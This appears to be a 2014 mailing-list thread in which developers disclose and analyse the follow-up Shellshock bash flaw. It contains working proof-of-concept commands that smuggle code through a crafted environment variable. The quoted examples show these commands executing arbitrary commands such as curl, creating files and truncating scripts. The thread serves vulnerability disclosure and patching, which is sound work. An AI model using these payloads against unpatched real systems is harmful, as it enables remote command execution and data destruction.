Also, you can embed arguments, allowing for arbitrary execution: $ env -i X='() { (a)=>\' bash -c 'echo curl -s https://bugzilla.redhat.com/'; head echo bash: X: line 1: syntax error near unexpected token `=' bash: X: line 1: `' bash: error importing function definition for `X' <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>Red Hat Bugzilla Main Page</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="verify-v1" content="1hLjVPyIYh2cX7CL+s5A0k6pKt2FRq7/FSQ/cqGi9J8="> <meta name="y_key" content="1cdf458efae704ba">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> On Wed, Sep 24, 2014 at 6:44 PM, Ángel González <an...@16bits.net> wrote: > Eric Blake wrote: > > https://bugzilla.redhat.com/show_bug.cgi?id=1141597 describes this bug > > (aka CVE-2014-6271), and points out that even _with_ this patch, there > > is still a flaw that attackers can use to overwrite portions of the > > filesystem, which is also a possible exploitation avenue: > > > > $ ls -l date > > ls: cannot access date: No such file or directory > > $ env -i X='() { (a)=>\' bash -c 'date' > > bash: X: line 1: syntax error near unexpected token `=' > > bash: X: line 1: `' > > bash: error importing function definition for `X' > > $ ls -l date > > -rw-------. 1 taviso taviso 0 Sep 24 14:06 date > > It doesn't just create 0-sized files: > > $ echo "{ echo 'Hello World' }" > foo.sh > > $ VAR='() { (a) =>\' bash foo.sh > bash: VAR: line 1: syntax error near unexpected token `=' > bash: VAR: line 1: `' > bash: error importing function definition for `VAR' > > $ cat { > Hello World } > > > OTOH, had we used bash -c foo.sh, it would have removed the script > contents (truncated to 0 bytes). > > >